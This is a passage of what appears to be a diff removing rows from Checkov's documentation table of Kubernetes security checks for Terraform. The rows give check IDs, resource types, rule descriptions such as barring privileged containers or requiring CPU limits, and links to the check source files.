CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | -| 1821 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | -| 1822 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | 
[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1823 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1824 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1825 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 1826 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1827 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1828 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1829 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 1830 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1831 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1832 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1833 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 1834 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1835 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1836 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1837 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 1838 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1839 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits 
should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1840 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1841 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 1842 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1843 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1844 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1845 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 1846 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1847 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | 
[ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1848 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1849 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 1850 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1851 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1852 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1853 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 1854 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1855 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers 
| Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1856 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1857 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 1858 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1859 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1860 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1861 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 1862 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | 
[ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1863 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1864 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1865 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 1866 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1867 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1868 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1869 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | 
[SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 1870 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1871 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1872 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1873 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 1874 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1875 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1876 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1877 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1878 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1879 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1880 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1881 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1882 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1883 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1884 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not 
be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1885 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1886 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1887 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1888 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1889 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1890 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1891 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1892 | CKV_K8S_21 | resource | 
kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1893 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1894 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1895 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1896 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1897 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1898 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 1899 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) 
|
-| 1900 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1901 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1902 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1903 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1904 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) |
-| 1905 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1906 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1907 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1908 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1909 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1910 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1911 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1912 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1913 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1914 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1915 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1916 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1917 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1918 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1919 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1920 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1921 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1922 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1923 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1924 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1925 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1926 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1927 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1928 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1929 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1930 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1931 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1932 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1933 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) |
-| 1934 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 1935 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 1936 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 1937 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) |
-| 1938 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 1939 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 1940 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 1941 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) |
-| 1942 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) |
-| 1943 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
